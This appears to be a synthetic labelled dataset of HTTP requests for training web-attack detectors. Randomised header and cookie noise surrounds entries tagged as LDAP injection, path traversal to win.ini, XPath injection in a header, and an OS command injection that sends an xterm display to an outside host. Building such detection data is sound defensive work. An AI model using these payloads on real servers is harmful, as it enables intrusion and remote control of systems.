If-Range: "eVkG7.EujvlwMIcpgkt"
Max-Forwards: 1541
MIME-Version: 3.2
Pragma: i='tMr'
Proxy-Authorization: lert mmeei=fdhn
Authorization: Basic ZTJ0MG41ZDo2b3N1
Range: 7-9905
Referer: /BD2gny.jpeg
TE: gzip,gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 3.3; d2-sr; rv:5.5.7) Gecko/56492851
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: 3.1 227.87.69.177, 4.6 www.Ehs1nch.jpeg
Transfer-Encoding: compress
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12156
Start - Id: 14537
class: Valid
GET /buitc/eb/oeet/e7twehhs/myycA_xp_T3group byVgJc/t3WTpZ/pVHWeiL/egwrleritini.html?YlOcKGUIN=3953363 HTTP/1.1
Host: www.Aeeeemb.st:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: 3alr3np-ho, efit-m, ddOe-nednbo
Cache-Control: no-store
Client-ip: 162.156.75.53
Cookie: ulhhaeLRtlyiboe=wherep;oluhhHuNca=otfAs;pac0=arongmtss4exdli;jUenadOd=dMU1;ham0T=06;nis1llt0y7euwr=010
Cookie2: $Version="9"
Date: Sun, 02 Nov 08 03:41:12 UTC
ETag: "vCcBAqRPR5i-s-_Kr@S"
Expect: dfuOmt=Nehn4
From: izhee@mtbHevOaee.gov
If-Modified-Since: Thu, 24 Nov 05 17:07:20 GMT
If-Unmodified-Since: Thu, 06 Aug 09 01:20:52 CET
If-Match: *
If-None-Match: "hbv3gqbW5Z7KiMSgk.pc"
If-Range: Thu, 28 Oct 04 07:43:17 UTC
Max-Forwards: 2975
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic ZWlyYXRhZW46YW50TWdh
Authorization: NTLM aTc1c2kwb0VsdGhtbzJ1M1dvbmpzc1VyZGV0aGhhcW1kZGVPdGFtMA==
Range: 4019-22,-23,269-5
Referer: http://www.lsneSego.ch/sclrcwt/hmtonhl.pl
TE: gzip,trailers,chunked
Trailer: If-Range
User-Agent: doUjvt/1.2.8.2.3
UA-CPU: x86
UA-Disp: 2949,5264,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3486x145
Via: neodyr/9.7 18.14.183.236:9
Transfer-Encoding: gzip
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 267686461
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14537
Start - Id: 33463
class: Valid
PUT /8XJFCH@FAwEVBpl/yQkg_lbs/lrnersecaconots/av6F6161ssIMW/2P54Ctm6z/uc6ashcan1an0ctjOm/az46@mf@eRkDvb24epD/fO1FMudPD2u/_@nconnectyBXuJ/st/jegsretd7.gif? HTTP/1.0
Content-Length: 247
Content-Language: n,tw,e
Content-Encoding: identity
Content-Location: http://www.niaae.uk/49nrec2y/lrAn/urnitnb.zip
Content-MD5: Y1I5OXNuYmhvZTZuZWlpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 08:38:10 GMT
Last-Modified: Wed, 14 Jun 06 02:14:56 CET
Host: www.luipheem.uk:80
Connection: close
Accept: application/*;q=0.8, text/*, text/*
Accept-Charset: iso-8859-9;q=0.2, x-mac-korean;q=0.0, x-mac-chinesesimp;q=0.7, x-mac-roman;q=0.2, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 228.217.70.170
Cookie: l1mteecczb=O-d;i4usni=801294483;YDUO=jvIe~dot>hLm7we;Gcn=75250493
Cookie2: $Version="672"
Date: Sun, 21 Mar 04 08:23:03 CET
ETag: "hrwgRJ9u7n-@mj6e"
Expect: 100-continue
From: arra@bopdn.biz
If-Modified-Since: Wed, 12 May 04 13:06:52 UTC
If-Unmodified-Since: Thu, 02 Nov 06 03:58:53 UTC
If-Match: "GyXx2EaDd@I9a.gRxH"
If-None-Match: *
If-Range: "9Hxph_l6SLtvYMR9Ro"
Max-Forwards: 82
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: TeB5l h3soShyf=6eets
Authorization: onucec etstwxn=e0Mlo
Range: 02748-,068714-
Referer: http://FoOWx.be/e0Iusiaw/rdjhs4s/d2amr/hts7n.dll
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: rOo-j5GLA http://www.maoasq9x.st
UA-CPU: MIPS
UA-Disp: 2518,5185,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 460x027
Via: 7.1 www.dopinnm4.tiff, FTP/5.0 87.104.122.134, 2.7 www.sRtet.gif
Transfer-Encoding: gzip
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9-EfyA=81044&LPLHJ0dallK=80977944&da6eySc8slyfs=eorkNlOxblGmeho&sass5enSor3hm=eM0w_6SGZBn&otAiaop3=G&8d-_Icperl6M2=cjyfRtki&esrlem=26&Nws6Etaass8=3z ut&ajisnl3=ltI8&eavgt8tr1ydd7=53026450&oorHe=124&rekcaott=rsiOzloea&6cnnet=rcRr1&a2ise6iir2h=aaaba

End - Id: 33463
Start - Id: 37659
class: LdapInjection
POST /yU/sZHO-X/ssebcrt.cgi? HTTP/1.1
Content-Length: 71
Content-Language: 02ehizsy
Content-Encoding: identity
Content-Location: /nexpm9eO/feayi/vnzA/ssrucph.pl
Content-MD5: Ym5Sb294bWllY2RPbnJhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: www.o1riaIaT.net
Connection: close
Accept: application/*, text/*;q=0.8
Accept-Charset: iso-8859-1;q=0.6, utf-8, windows-1255
Accept-Encoding: compress;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="3"
Date: Tue, 16 Dec 08 12:38:12 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: dI7o=fopMiaaa;che6mei=fphDmee
From: TttDoe@rczep.it
If-Modified-Since: Sun, 11 Oct 09 11:47:18 UTC
If-Unmodified-Since: Sun, 10 Dec 06 08:43:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1810
MIME-Version: 8.2
Pragma: t4hCt=ocaer
Proxy-Authorization: Basic dUhlbTJpOnJzbXR2bHNx
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /dteEe/ca0l/qbayc/ugieUbMe/ocnvD.php4
TE: deflate;q=0.0
Trailer: Connection
User-Agent: Mozilla/3.7 (X11; U; Open BSD i586 9.0; ed-hw; rv:1.7.9) Gecko/70586201
UA-CPU: StrongARM
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 7.9 25.155.173.193, 8.4 www.arto.tiff, 3.1 226.237.231.204
Transfer-Encoding: Edla0w; ealhgc=lFheip3
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ce=")(targetfilter=(o=NetscapeRoot))&fdtbmtefE8tf0=5199

End - Id: 37659
Start - Id: 21522
class: Valid
GET /rI0/trthBFisnl/0processing-instructionA9lytA.-_I/lhi6rsybqeiyrsTa/1OnarfcT/lga.htm?neevhmsile=shavingnimbg+noreat HTTP/1.1
Host: 155.100.79.193
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: mheiW-e2nN;q=0.6, yl1-edhoctr, Lc-eo, stL-ips;q=0.2
Cache-Control: no-cache
Client-ip: 124.127.111.172
Cookie: n7Oliiiss=ori<dheli1;mnP2aetna3tcah=72818
Cookie2: $Version="611"
Date: Sun, 08 Oct 06 18:28:28 UTC
ETag: W/"ntfELDStUc0DhxJ4BRh"
Expect: bnur
From: 2T2s@ttdsSsnEe.gov
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sat, 09 Feb 08 12:29:48 CET
If-Match: "8lR_V7Y9Jqrtz0JrSuzJ"
If-None-Match: *
If-Range: "vPI9nbbMlWZdnQF"
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="o4Esftv"
Authorization: NTLM Y3JlOGRlM2pkcmhzZXM1YW1jb0RmdDFoaXRhemVpdG9TZHNuRWVhb2Vhc2M=
Range: -6570,934358-908192
Referer: /Urrdy1at/acuee/inooi.jsp
TE: trailers,gzip;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: hOad (rIbHRlk; hhaaEhcF; sEfJYV3)
UA-CPU: StrongARM
UA-Disp: 1794,9369,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5415x3665
Via: 6.9 www.itinrHer.html, HTTP/8.1 120.38.125.137
Transfer-Encoding: identity
Upgrade: ehe/1.1
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 204.143.131.123
X-Serial-Number: 15490998338905562
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21522
Start - Id: 3122
class: Valid
GET /2SWD0yGl.swf?esrbh=699&ua=nolink&si=himloUT%3A&ztruooo=2263&l4rhlh=c&69PKhlshttpWZ33=8&1connect_bofHy3=9 HTTP/1.1
Host: 127.88.253.194
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: w0r-0ysfoea;q=0.0, A-rrn
Cache-Control: no-transform
Client-ip: 53.213.84.202
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="133"
Date: Fri, 10 Jul 09 15:02:22 GMT
ETag: W/"k1bDH-QRD6giy00AGJ0"
Expect: 100-continue
From: eead@01e8oq1.gov
If-Modified-Since: Sun, 02 Mar 08 15:27:55 UTC
If-Unmodified-Since: Sat, 17 Jan 09 03:55:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.9
Pragma: n='da'
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic cnNsem5waTp1eXNs
Range: -6106,0309-,1-
Referer: /t8eElo4t/ituket/onn4aid/4AeAYihn/1deieie2.jpg
TE: deflate;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.8 (compatible; MSIE 6.6; Linux i386; noHrts; srzenorax)
UA-CPU: PowerPC
UA-Disp: 345,165,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5219x775
Via: FTP/1.9 www.mfHi.css, 2.2 www.ireamne.shtml, 3.0 177.63.7.182
Transfer-Encoding: gzip
Upgrade: n4c/0.0, pOx/3.9
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 1722875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3122
Start - Id: 24400
class: Valid
GET /uka8n/aui/3s/access_logX_VJkJ/p7bqh-X-XC3UVhY6@Ul/oqdZ/8rot1isetRos/lnmejsnoausf3/p0hi1avntLsu9re/qp31fZk..-/Va.shtml?AwxmlJgroup bygWd6hN=G%2B&sma=hostyle HTTP/1.1
Host: www.Dsome26W.cz
Connection: et3ee
Accept: text/plain;q=0.2
Accept-Charset: iso-8859-9;q=0.4, euc-kr
Accept-Encoding: *;q=0.3
Accept-Language: 2h63ad-Q2ltEv, y-oicw;q=0.4, e-W6we;q=0.6
Cache-Control: no-transform
Client-ip: 181.101.138.119
Cookie: ogen6btEox=783;7aU=3;Aeioakabzd=oynetwl;0lhnl6oiOh=rhq;swsUdhh=%y7ey ~;56lt=eSwaeta2
Cookie2: $Version="260"
Date: Fri, 24 Oct 08 22:50:06 GMT
ETag: W/"Y8t9Jwc-W9EvZwb"
Expect: cNyhm=tkhT
From: e8g1@ha9sec5.ch
If-Modified-Since: Mon, 07 May 07 10:12:54 UTC
If-Unmodified-Since: Tue, 12 Jul 05 19:44:06 CET
If-Match: *
If-None-Match: "9WP84YsxYwUb8_hGHA"
If-Range: Thu, 03 Feb 05 11:55:56 CET
Max-Forwards: 9054
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest response="03f5CBdFe1b3b7aFaCeAB191f27Fe5e8"
Authorization: NTLM d3NyZ2RZNmVOZWVlYVN4ZXJTcnNvcm9ldVMzOXdiN3U=
Range: 4584-
Referer: /biE0ev/g4dtea.js
TE: chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/6.5 (Windows; U; Win98 5.8; yo-is; rv:2.2.3) Gecko/74150327
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1274x3966
Via: FTP/2.8 www.apeAYu.gif, 4.2 133.224.22.121
Transfer-Encoding: gzip
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 469 www.tdcl.js "anew82tiB4Desxdnh" "Thu, 02 Oct 08 03:59:00 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 881526835
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24400
Start - Id: 5406
class: Valid
PUT /id_PEL.Pe/59uf/sDFrlg5QZDFAq_x2N/ltr3i2tine/toees1Aok/ssarUeau34s1/icawiA/elt6embz6iseipuzl/Udptfreueievaa42dhM/e8_-q3S9Iv-pchYQ0t/ibdvaN/ozPeOExj_4HICIma3S.png? HTTP/1.1
Content-Length: 202
Content-Language: aet0,miwrljue,a
Content-Encoding: deflate
Content-Location: /ntmsl.gif
Content-MD5: cmFhMmlvOXBsTTFScnR2RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jul 04 16:47:06 CET
Last-Modified: Wed, 07 Feb 07 01:38:57 CET
Host: 156.135.169.143
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-2022-kr;q=0.9, x-mac-greek;q=0.4, ks_c_5601-1987;q=0.6, windows-1251;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: gRaimcon-Ta;q=0.9, eU-ayme;q=0.4, mt-o4efy3s, ehneOn-egoBwR;q=0.0
Cache-Control: max-age=901
Client-ip: 49.138.242.29
Cookie: cE=i3OtpaZeod;95ZFMviframe=ntemceegcITns;taSoerihal=8368905224
Cookie2: $Version="9"
Date: Sun, 05 Jul 09 01:40:29 GMT
ETag: W/"vt.0GkL2HP63RDUQ0If"
Expect: uools=kenw;bnaue4
From: aoaomzge@wiejdTf.ch
If-Modified-Since: Fri, 27 May 05 11:53:34 UTC
If-Unmodified-Since: Fri, 31 Dec 04 10:43:36 CET
If-Match: "NQBokgsdNGLa51rKg4"
If-None-Match: "TGoGU@8K3qv@oeJ"
If-Range: Fri, 04 Apr 08 19:24:17 CET
Max-Forwards: 8
MIME-Version: 4.5
Pragma: 3='tiymO'
Proxy-Authorization: Basic bXN5YXJhOmlyZkljbnRo
Authorization: Basic YWxlb2k6c25MaGFz
Range: 33401-381,35239-,-73
Referer: /ffNs.tar.gz
TE: gzip;q=0.8
Trailer: Range
User-Agent: Mozilla/8.4 (Windows; U; WinNT 3.2; rj-tn; rv:7.1.5) Gecko/09579210
UA-CPU: x86
UA-Disp: 958,782,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
Via: w1mzdd/1.7 www.t8e4Mel.css, ovo/1.0 www.rrr3eY.js
Transfer-Encoding: 0ept
Upgrade: s4syeh/8.2, Palt/1.0
Warning: 771 24.33.242.71:14 "tear3zyE23loeliir" 
X-Forwarded-For: 13.159.36.160
X-Serial-Number: 759836500
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eh4liY1beeefxe=-&oar5htty=O2Lrvbtjn&aeh6e8iiRei=t&Q3tttvyv=ernrtuepteti&sfew4t1p=c6i&eoOtbDrlEot9nJ=e&ttnu8=enh2ReagAl3riWf&dswHRot5hn5N=beand/oer\tcopy&eCsriaeydNcot=og&lC)tngroup byespNtelnetU

End - Id: 5406
Start - Id: 31000
class: Valid
GET /auc/nsaei/u6fenaeptieae/wulRnBrmqYHcrc/wulXEd3/euevk5/bA/se/K.-AliframeevalexecftpJPU5dropm.cfm?3I8C4=irp&rAtts4Ds=5rnKkfbendDmaa&fsg0EsiIsisbest=196&Tbqsu2=nnszdsahsha&0altsni0e1ofwo1=t&eljispnei3lceqs=e0lngS58ahinthde&ao6ctstw=cs-AYTi2K&qoiheesee1sv=see&oup=s9r9qhavingmh&ntlfsneeefe3em=%7Encid%25ldtp+ssaEAre&6e8nwon8.si=f%3F&b4qourt=6691761&nEpMn=92330911 HTTP/1.0
Host: 183.40.189.178:80
Connection: tsamcnyl
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-9, x-mac-roman, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: iceci-dlsiqo;q=0.6, t-tsj;q=0.0, vlti-raj;q=0.0
Cache-Control: etceB8e=attsopr
Client-ip: 93.143.127.166
Cookie: i5Idnd1nn=o;es=aj'nbmrgrI we;eh=82;p42cl=0735549416
Cookie2: $Version="428"
Date: Sat, 17 May 08 21:30:09 GMT
ETag: W/"el0c1yy8dBuCFQ9LYC"
Expect: iRaev2ns
From: vle24@irebeh.gov
If-Modified-Since: Mon, 20 Oct 08 12:33:58 CET
If-Unmodified-Since: Tue, 27 May 08 19:55:41 GMT
If-Match: "d2pM26oWGxvU3g-g"
If-None-Match: "ofXfLh5gt4u._ERnZx"
If-Range: "Duh8p-TECDGi6-8"
Max-Forwards: 10
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: Digest qop=auth-int
Range: 740-8502,247843-588
Referer: /rsvw5oH/oo5i.php3
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (compatible; MSIE 9.0; Win98; iwyrvmowe; hUai5bp)
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: nlc/6.0 35.250.117.196:1017, sstre/3.6 www.deeadeO.css
Transfer-Encoding: gzip
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 175 www.rwitemw.jpeg "lzlarmInhrd" "Wed, 18 Jan 06 20:37:52 CET"
X-Forwarded-For: 73.18.235.121
X-Serial-Number: 65625
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31000
Start - Id: 19867
class: Valid
GET /weseca1fonjdath/tm2Vb6AF-uM9BQv3hi/3NnYAmX9rt3/efaylohhdiarg/eegcpqnorbedsivrhwb/ee1Ie/ej3_PJSso9FumndrKx/rFw9XJHqFUGNDc/nMmAR1AWn@qZHj.css?IEreservices6ftp=360577&oooyb=umHaxoir&ofdomoioeplre3=80&ohiou8tenz=684&tNrtne8lae=ldhrqjhyu&1nm0VQN0iadmin=y&qDkN66ZFv80A=7&oae1drt=%3Cc&syelif2sloe=iTpRhHcSZP6m&eaei=a+e&edsqlt1aiee=44&etiee=afqCpk6&ntsrlc=5linko79eitiq%272&@Jvqp_UQM=983 HTTP/1.0
Host: www.faeeC7e.fr:618
Connection: eTtxica
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.5, iso-8859-15;q=0.8, koi8-r;q=0.6, koi8-r
Accept-Encoding: *
Accept-Language: esdTts-naS;q=0.4
Cache-Control: no-cache
Client-ip: 81.103.210.242
Cookie: EuTnsueeECnm=weBIaMBa.;tmp3Bv=0731;bSooeaissz7=etcadocumentuei|6;ealH6wfaobqntel=ee4 dbEl ;xterm6r71xb=4FYs0Qz
Cookie2: $Version="4"
Date: Wed, 15 Mar 06 06:30:24 UTC
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 1rnsOmot=ljdt;lColI
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 18 Apr 04 13:20:12 CET
If-Unmodified-Since: Sun, 05 Sep 04 16:25:04 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic YXRkcFRlZTpuc0UyZW5pbA==
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
Referer: /euu1/gwb7i/hsln8tt.jsp
TE: chunked
Trailer: If-Range
User-Agent: anhcibte (zO4MvS; tUepIk)
UA-CPU: StrongARM
UA-Disp: 8005,879,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/1.7 223.41.134.84
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 72392251969185668
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19867
Start - Id: 5434
class: Valid
PUT /CFF5_9EA_/7gLa1qRxa1.sGcrO9XuZ/uF0X/qcmt/t-264M/oZY/TeqQh5ru/sh2dNE/lenh/ivubsUtfph9arI.aspx? HTTP/1.1
Content-Length: 58
Content-Language: yru1,qU
Content-Encoding: deflate
Content-Location: /tdpfl3n/33mn/lte1/iecl2a.nsf
Content-MD5: ZW9ybHhlaXNvZzd6d2w5dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 May 09 09:19:27 UTC
Last-Modified: Thu, 10 Aug 06 19:22:54 UTC
Host: 205.10.125.96
Connection: close
Accept: */*
Accept-Charset: windows-1257, x-mac-greek, iso-8859-1, koi8-r;q=0.3, koi8;q=0.3
Accept-Encoding: deflate, compress, deflate;q=0.6
Accept-Language: 1rAk6-os3r4;q=0.3, ef-ta6, tor7heo-i39rrtwe, mpdtd-xoOrgE;q=0.8, At3ghq-d;q=0.2
Cache-Control: only-if-cached
Client-ip: 9.201.23.222
Cookie: nlrgnoio=bteb
Cookie2: $Version="13"
Date: Sat, 26 Jul 08 01:09:33 CET
ETag: "GdhQ7zVO5_wsjp1g"
Expect: 100-continue
From: duemse@aiti.it
If-Modified-Since: Sun, 25 Dec 05 02:58:24 UTC
If-Unmodified-Since: Tue, 27 Jul 04 16:45:12 CET
If-Match: "ercKWFyC73sZFhQ"
If-None-Match: *
If-Range: "73G85LvJYH3T8IuJw"
Max-Forwards: 63
MIME-Version: 8.8
Pragma: t9=82rr3slj
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: NTLM bTViZ2FodGhoZ211dHRlbmIwZXB5aWlibm9yaHRpZXZ3
Range: 59244-
Referer: http://derctnnn.st/haoslsdr/uecbsa.bin
TE: trailers,deflate,gzip
Trailer: Expect
User-Agent: xa0skoz (hfvZN9DpY)
UA-CPU: MIPS
UA-Disp: 1986,145,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 375x4615
Via: FTP/8.0 www.ndmhsh.shtml, olt/2.1 44.25.126.225
Transfer-Encoding: oRai; nDql1=ro7Ei8ev
Upgrade: RahN/5.1, tLrem/6.4, ett/3.2, iub/6.4, gni/3.3
Warning: 029 www.tlotee.shtml "e3enowe" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dlmoa9=4811292&59xMOsprocessing-instruction1dkv1=9eas86noo

End - Id: 5434
Start - Id: 36206
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: 39.100.201.70
Connection: keep-alive
Accept: application/*, video/*, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.4.113.141
Cookie2: $Version="3"
Date: Sun, 13 Jan 08 24:05:43 UTC
Expect: 100-continue
If-Modified-Since: Fri, 18 Jun 04 21:07:23 UTC
If-Match: "BL6_@8kSIXD9@TvuYy"
If-None-Match: *
If-Range: "8XV@_2tDEk.7skyj.Qd"
Max-Forwards: 4923
Pragma: no-cache
Authorization: Basic ZGRhaGVlbTo4c3RlaA==
Referer: http://www.etNtxAs1.cz/seH9hi/d8ekee/i17pa.sh
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/9.6 (X11; U; Solaris 0.9; et-85; rv:9.4.6) Gecko/50801753
Via: 1.7 www.sqetltr.jpg, 5.3 www.borc.jpg:33
Upgrade: sst2oo/6.7, eatt/1.0

null

End - Id: 36206
Start - Id: 36780
class: OsCommanding
GET /BSB9droptmph5/ongc21gx5otical9Is/wetcjhedE4Tatidetr/qgemrenrcngeIdrg/lTrIat3mftitNta5uee/rWB/iXmhwYcKq0Al5q0i.jpeg?Tresreuthefo=94785&pHlhandU6vbscriptsocmail=e+js+yeacrwMfti&nZvCsamKIQNk=+cmre-n&8tE2pz=pshtnonb+atumotyrhii&rmaila2=22239746&ooStiikr0mdrvc=%250A+++++xterm+-display+www.iticge.com%3A0.0+&loM=s2%3FNUmikvoh&DisDee5In=osiozthagtfr4t HTTP/1.1
Host: 153.64.69.55
Connection: o7kitj
Accept: */*;q=0.2
Accept-Charset: x-mac-roman;q=0.6, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 183.149.193.186
Cookie: lifetcdastseo1=87673155;_boot.iniautoexecconnect5K=autoexecwm2]td:oeoi;eojsrrqo=\ i
Cookie2: $Version="60"
Date: Sat, 06 Mar 10 19:35:22 CET
ETag: W/"dhJetYBuk7aifOA"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Mon, 23 May 05 03:17:55 UTC
If-Unmodified-Since: Sun, 26 Dec 04 20:40:07 GMT
If-Match: *
If-None-Match: "tjlqSMTcuNUJnPiC"
If-Range: Wed, 22 Nov 06 11:14:50 UTC
Max-Forwards: 596
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: /eolnd/wwetbo/ihnj/twvtn.gif
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: iN6bThJVvY http://www.hlgcaj.uk
UA-CPU: MIPS
UA-Disp: 8446,438,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36780
Start - Id: 48310
class: XPathInjection
GET /shutdown1liU0qoLnhautoexecYwhtpass/rJRE/Aatk7indvc5aa8a/tTmulYaskaoi/wZHRvAK24aBzpDo/6dmwVrdPZMlEyqx0/e2iw3/iBtDkYGkq78thx/ra/onsooiDsda.exe?lEllu9tdilacs=2849&Rlt=+ne5axs%24h&autoexecOVHIi=axi&ttexcA7wsm=czo&ipu8kget5Vrtd=etapswdqhtaccesaccess_logrtn+stdinta&irwbiott=amk&eirsi22owmuwnm=nulll&fncopyv.k=vlErPH8O9P&osre68raAI=E%5D8ln%25olrer%28vnn&jaccept3oXa=9&7lelh54pL=8&nremftlwm=v1fOZ&SZ2OrS=757353 HTTP/1.0
Host: www.ennnn.st:6
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 03336  or     1< Gy/n/6ove/child::text()[position()=943]    or  42='] | /* | /foo[bar='
Accept-Language: *
Cache-Control: B4eius='6W'
Client-ip: 160.149.221.171
Cookie: OvCL1=ai 0naowi@Y;ergeqdsddseiiS=lqe;sLaoe6bois=supdatennfaeO0Oxukm;s7rm=yua;xiBeeypn8=$aRnh
Cookie2: $Version="77"
Date: Fri, 17 Mar 06 22:11:14 GMT
ETag: "5iy6r8NdIpbUNk@VBE"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Fri, 21 Sep 07 23:08:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jul 05 21:15:21 CET
